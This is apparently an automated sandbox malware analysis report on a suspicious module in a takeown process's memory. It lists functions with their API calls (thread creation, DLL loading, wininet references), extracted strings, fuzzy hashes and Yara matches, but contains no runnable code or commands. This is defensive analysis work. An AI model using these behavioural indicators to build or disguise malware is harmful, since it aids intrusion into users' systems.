Opcode ID: fd99b9586f9575182eccf43b7f244fa3626c3010caf0a2fbb92dad7323f6a58d
Instruction ID: 929e1a4d1ade8a977d91d3d35e3cf9384099ef5729adab172720c4d0de72e1a4
Opcode Fuzzy Hash: fd99b9586f9575182eccf43b7f244fa3626c3010caf0a2fbb92dad7323f6a58d
Instruction Fuzzy Hash: C9900435311404070505F5DC0704507004FC7D7351357C133F3415550CD735CD715131

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2FBA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4738e2fb0c51b6d11be68d7e13230e7305f3b856d7d3780e26ecc13d92984a0d
Instruction ID: 1d4dc26ad5a9d0aca37e7a70590a03793e6e6e5bb91fe6b6fe27b433c097622c
Opcode Fuzzy Hash: 4738e2fb0c51b6d11be68d7e13230e7305f3b856d7d3780e26ecc13d92984a0d
Instruction Fuzzy Hash: D4900221601404464540B1A888449064009EBE2211756C222B1D98550D875DC9755675

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2FEA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 28c8ddeb846ebd0d17e4282be19fa2d2e10539b4aa3d9d8c5440865e5c729fc4
Instruction ID: b43ac5f8bf5a09464fea6e1e5d3d2f1bb5c77615937d29f55d8f8b8d5f4adcbc
Opcode Fuzzy Hash: 28c8ddeb846ebd0d17e4282be19fa2d2e10539b4aa3d9d8c5440865e5c729fc4
Instruction Fuzzy Hash: D0900221211C0446D600B5A84C14B070009C7D1303F56C216B1554554CCB19C9715531

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2F3A

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c1cb8cd9217bc6df0c5ffdffec487e483b57d2a3b93879727cfcfa3342b63540
Instruction ID: 9bf2661356f4d8d2dac9a1e4703aee7aa7f4c33160e4ef4b2f908321823887dc
Opcode Fuzzy Hash: c1cb8cd9217bc6df0c5ffdffec487e483b57d2a3b93879727cfcfa3342b63540
Instruction Fuzzy Hash: 0890026134140846D500B1984414B060009C7E2301F56C116F2464554D871DCD626136

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2E8A

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c66a974988a31fefb005de1cdf4d9a2df721865cfc8dfcb9ef9d4be5f4fff4dc
Instruction ID: f4af583eecbdb3a1568d0b24674ef9bad6fec24a9ad23604f035dc52a1eb2e8a
Opcode Fuzzy Hash: c66a974988a31fefb005de1cdf4d9a2df721865cfc8dfcb9ef9d4be5f4fff4dc
Instruction Fuzzy Hash: 1890022160140906D501B1984404616000EC7D1241F96C123B2424555ECB29CAA2A131

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2EEA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f65d95fd7da50cc909712f21188158b286a47e52b94fd2f41574aef2a376631f
Instruction ID: 9933062cf2d6348a61872c43af8bb7b1cb24116a3b6b65bfe7bc8f87e770cba6
Opcode Fuzzy Hash: f65d95fd7da50cc909712f21188158b286a47e52b94fd2f41574aef2a376631f
Instruction Fuzzy Hash: D090026120180807D540B59848046070009C7D1302F56C112B3464555E8B2DCD616135

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2DFA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4de9ce2dd60ed9f56d657a072a17827c537507fecd486b70972e0bd770a6976b
Instruction ID: 502e630e0aa76273f90f55cc36d6a2878d73e09da6add801d0caedc22e7df126
Opcode Fuzzy Hash: 4de9ce2dd60ed9f56d657a072a17827c537507fecd486b70972e0bd770a6976b
Instruction Fuzzy Hash: 6490023120140817D511B1984504707000DC7D1241F96C513B1824558D975ACA62A131

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2DDA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8fb2ad19023a5c26566f37b346c2221bd73ed62e284421a44079af7a367ceab9
Instruction ID: 17a7431c5d432fee9ec71dc8e608a7ac53a7286347fd4b006debb0c0315df944
Opcode Fuzzy Hash: 8fb2ad19023a5c26566f37b346c2221bd73ed62e284421a44079af7a367ceab9
Instruction Fuzzy Hash: 47900221242445565945F1984404507400AD7E1241796C113B2814950C872AD966D631

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2D3A

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6bb9082bc737287b65b0f94d2d240cca69030de0260a9649f97ff9c3e774018b
Instruction ID: dea429560c8cd0af452837cfcfe81ca7be86c3a46539bc97eafa2322be7d3868
Opcode Fuzzy Hash: 6bb9082bc737287b65b0f94d2d240cca69030de0260a9649f97ff9c3e774018b
Instruction Fuzzy Hash: 1A90022130140407D540B19854186064009D7E2301F56D112F1814554CDB19C9665232

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2D1A

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb37bb3d1568f90f130c89f3a9912e83b9313dce923c53a7907fea0d8f21f69d
Instruction ID: 3da409bb40e823c9a94a59e5836531d4d4f77e8ae5a41f935077bb90af36b7f5
Opcode Fuzzy Hash: cb37bb3d1568f90f130c89f3a9912e83b9313dce923c53a7907fea0d8f21f69d
Instruction Fuzzy Hash: 4B90022921340406D580B198540860A0009C7D2202F96D516B1415558CCB19C9795331

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2CAA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1de10124efe612133d26f2b5710e06ec30aa1d29fee8040fbea2223dead184c2
Instruction ID: 11af5bbf922ab1bdfd3413e3aaf37df327dd0ebf3c0596e1b43e6ce73c1b9fb8
Opcode Fuzzy Hash: 1de10124efe612133d26f2b5710e06ec30aa1d29fee8040fbea2223dead184c2
Instruction Fuzzy Hash: E690023120140806D500B5D854086460009C7E1301F56D112B6424555EC769C9A16131

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2C6A

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 19a2a8352d14011a7883f53198fbd3866333c52c5f94593f37eed8f3863fa3b5
Instruction ID: f6cff024e4bb91192d66800b1fc09d4d950d24c715e2073ced1f5212982baa09
Opcode Fuzzy Hash: 19a2a8352d14011a7883f53198fbd3866333c52c5f94593f37eed8f3863fa3b5
Instruction Fuzzy Hash: 4390023120140C46D500B1984404B460009C7E1301F56C117B1524654D8719C9617531

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2C7A

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e59115eb818be521312034e2e1a2ee6c773ca4332ddf9c86280a20e4242e467e
Instruction ID: 263b07ca95d6ddac0a044103ad5ad74ee2da34b34914f9957f457eaa1b125e59
Opcode Fuzzy Hash: e59115eb818be521312034e2e1a2ee6c773ca4332ddf9c86280a20e4242e467e
Instruction Fuzzy Hash: 9290023120148C06D510B198840474A0009C7D1301F5AC512B5824658D8799C9A17131

Uniqueness

Uniqueness Score: -1.00%

Function 03AE35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE35CA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b31ae2d55126e6cb7c17d3f1226b65fb697e9b7968ff2dcca28780f6e412ab4a
Instruction ID: 21a039f83aca40fa0c263d2e401bc6546a693dfc822c104ec9eba18147c6459d
Opcode Fuzzy Hash: b31ae2d55126e6cb7c17d3f1226b65fb697e9b7968ff2dcca28780f6e412ab4a
Instruction Fuzzy Hash: 8A90023160550806D500B19845147061009C7D1201F66C512B1824568D8799CA6165B2

Uniqueness

Uniqueness Score: -1.00%

Function 03AE39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE39BA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b570527deeb95a0bc721023f77ff1df0e88e368e5c97ec63984276c241d0b46
Instruction ID: 47f71515afe79f5c529180bf01ca55d6ab44669655255eaaf350ce29b132a5f3
Opcode Fuzzy Hash: 1b570527deeb95a0bc721023f77ff1df0e88e368e5c97ec63984276c241d0b46
Instruction Fuzzy Hash: 3290022124545506D550B19C44046164009E7E1201F56C122B1C14594D8759C9656231

Uniqueness

Uniqueness Score: -1.00%

Function 032E9228 Relevance: 64.9, APIs: 1, Strings: 36, Instructions: 167
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 032E9275

Strings

P, xrefs: 032E92DB
(, xrefs: 032E9625
o, xrefs: 032E94A5
m, xrefs: 032E94F3
<, xrefs: 032E93C4
=, xrefs: 032E93BA
@, xrefs: 032E9429
6, xrefs: 032E9451
Q,, xrefs: 032E9643
K , xrefs: 032E95A2
Z9, xrefs: 032E961B
?, xrefs: 032E94DF
(-, xrefs: 032E95D4
k), xrefs: 032E9697
U, xrefs: 032E93E6
+v, xrefs: 032E966F
d, xrefs: 032E94E9
~, xrefs: 032E93A6
l, xrefs: 032E957C
C, xrefs: 032E9568
*, xrefs: 032E9572
k, xrefs: 032E92FD
)E, xrefs: 032E96A8
26, xrefs: 032E92B8
d, xrefs: 032E9433
dS, xrefs: 032E92C6
aw, xrefs: 032E95C0
o, xrefs: 032E9392
E, xrefs: 032E939C
2<, xrefs: 032E92CD
+, xrefs: 032E931B
r-, xrefs: 032E965E
Yh, xrefs: 032E9665
[, xrefs: 032E9554
h', xrefs: 032E9657
S;, xrefs: 032E9639

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: (-$)E$*$+$+v$26$2<$6$<$=$?$@$C$E$K $P$Q,$S;$Yh$Z9$[$aw$d$d$dS$h'$k$k)$m$o$o$r-$~$($U$l
API String ID: 2422867632-760000345
Opcode ID: d32dd60d8401dc43b481dffb54bb5466025e9fc684a1645a748b61f1b5a3dae5
Instruction ID: 8efcc95122b740f66a6f2f6ab8a79445df83454c087281a85c2567e9293d44e6
Opcode Fuzzy Hash: d32dd60d8401dc43b481dffb54bb5466025e9fc684a1645a748b61f1b5a3dae5
Instruction Fuzzy Hash: 29B158B0D05769DBFB618F41C9597CEBAB1BB05308F1085C9C15C3B281C7BA1A89CF95

Uniqueness

Uniqueness Score: -1.00%

Function 032F064C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(43PI9J,00000111,00000000,00000000), ref: 032F0747

Strings

43PI9J, xrefs: 032F073C, 032F0746, 032F0757
43PI9J, xrefs: 032F074E, 032F0751

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 43PI9J$43PI9J
API String ID: 1836367815-3851319958
Opcode ID: 19fa5fd16c7e0924efb93434e3c3bcec3c7aea9b161f65a4cd9403ee2f00e823
Instruction ID: 1de5053b98815d884fd18e6381cbb349fa319a4d13a3044431b6905156963c4e
Opcode Fuzzy Hash: 19fa5fd16c7e0924efb93434e3c3bcec3c7aea9b161f65a4cd9403ee2f00e823
Instruction Fuzzy Hash: 0D213771D0124DBEEB11DBF08C91DEFBB7C9F45264F4885A9E610AF141D6744D0A8BA1

Uniqueness

Uniqueness Score: -1.00%

Function 032F06CE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(43PI9J,00000111,00000000,00000000), ref: 032F0747

Strings

43PI9J, xrefs: 032F073C, 032F0746, 032F0757
43PI9J, xrefs: 032F074E, 032F0751

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 43PI9J$43PI9J
API String ID: 1836367815-3851319958
Opcode ID: d9037f41c1c242129af66843e71cfea134991a9da7fc8bbeab4287586c3ab97c
Instruction ID: da9b9b326c30ba87e08f32af4d21e167ed683d02d09498182d4d5fc087279287
Opcode Fuzzy Hash: d9037f41c1c242129af66843e71cfea134991a9da7fc8bbeab4287586c3ab97c
Instruction Fuzzy Hash: D601C4B2D0020C7EEB11EAE59C81DEFBB7CDF41294F448065FA04BB240D6745E068BB1

Uniqueness

Uniqueness Score: -1.00%

Function 032F06D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(43PI9J,00000111,00000000,00000000), ref: 032F0747

Strings

43PI9J, xrefs: 032F073C, 032F0746, 032F0757
43PI9J, xrefs: 032F074E, 032F0751

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 43PI9J$43PI9J
API String ID: 1836367815-3851319958
Opcode ID: 1ed7fbba6a40b0eccc5e22e22def62be637151e629ae155a045f243be55d4169
Instruction ID: a9ddebb2c3a85ca77ee41f4fd209bb17e19ca1d5437bc576c0676d6a610eee99
Opcode Fuzzy Hash: 1ed7fbba6a40b0eccc5e22e22def62be637151e629ae155a045f243be55d4169
Instruction Fuzzy Hash: 0801C4B2D0020C7EEB11EAE58C81DEFBB7CDF41294F448064FA04BB240D6745E068BB1

Uniqueness

Uniqueness Score: -1.00%

Function 033027E0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 033028AB

Strings

net.dll, xrefs: 03302877, 033028FA, 033028D2, 033028DE, 03302906
wininet.dll, xrefs: 0330284E, 0330285A

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 272f6a30f503d508c959af628f23fd9675f8e934e2bf7629f02a3a42f833eff4
Instruction ID: a15a15aa03819896f59ef16f1f3b0dc6abca38b8e5c475de71e7930cbe90b8db
Opcode Fuzzy Hash: 272f6a30f503d508c959af628f23fd9675f8e934e2bf7629f02a3a42f833eff4
Instruction Fuzzy Hash: C5317EB5A01304ABD718DF64C8D4FE7BBA8EB48304F004529AA599F284D7B0B654CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 033027D9 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 95sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 033028AB

Strings

net.dll, xrefs: 03302877, 033028D2, 033028DE
wininet.dll, xrefs: 0330284E, 0330285A

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 80f1a0fbdb8faf441e3a4454e307c736b9ebb9de7c1aa1a7ec75662025d927b4
Instruction ID: 67637a32e2d650aa7020ab8035fbea503d2b2e05e33116dd76590e10dc7e0a72
Opcode Fuzzy Hash: 80f1a0fbdb8faf441e3a4454e307c736b9ebb9de7c1aa1a7ec75662025d927b4
Instruction Fuzzy Hash: 0331AFB1A01304ABDB18DF64C8D5FEBBBA8EF44300F048529EA499F285D7B07654CB95

Uniqueness

Uniqueness Score: -1.00%

Function 033027AE Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 033028AB

Strings

net.dll, xrefs: 03302877, 033028D2, 033028DE
wininet.dll, xrefs: 0330284E, 0330285A

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 0fa34b15cb79598463a3141a4d20430ad90e0736b5578f7793833287cbc9fc17
Instruction ID: 8eaacd5f6a71d5425a5673adab3934fb2a912f588410d27dffe2f545a653bff9
Opcode Fuzzy Hash: 0fa34b15cb79598463a3141a4d20430ad90e0736b5578f7793833287cbc9fc17
Instruction Fuzzy Hash: 9831C1B1A05305AFCB18EF24C8D4BE6FBA8EF49304F04466DEA999F281D7746650CB91

Uniqueness

Uniqueness Score: -1.00%

Function 032FE86A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 032FE887

Strings

@J7<, xrefs: 032FE89B

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: be88ecf9c52ec08706b07f4ad4c8513a88ece7f884f690fcac2359ab468f04fd
Instruction ID: f124f8951b986c16e445db7a680c216fe6696e479041d00401de75288b413139
Opcode Fuzzy Hash: be88ecf9c52ec08706b07f4ad4c8513a88ece7f884f690fcac2359ab468f04fd
Instruction Fuzzy Hash: 513164B5A1060AAFDB10DFD8D8809EFB7B9FF88304B118559E515EB214D771AE41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 032FE870 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 032FE887

Strings

@J7<, xrefs: 032FE89B

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 596b4ffa0084f302ce82effa2123405c1bda6d34144c98f9774bcb7938fe229c
Instruction ID: 7d7b1a5f974f19804e0f40af10b30e0fa4465a78b60032af256a68853fe9ad53
Opcode Fuzzy Hash: 596b4ffa0084f302ce82effa2123405c1bda6d34144c98f9774bcb7938fe229c
Instruction Fuzzy Hash: FB3150B6A0060AAFDB00DFD8D8809EFB3B9FF88304B158559E555EB214D771EE45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 032F4093 Relevance: 1.6, APIs: 1, Instructions: 52libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 032F4112

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
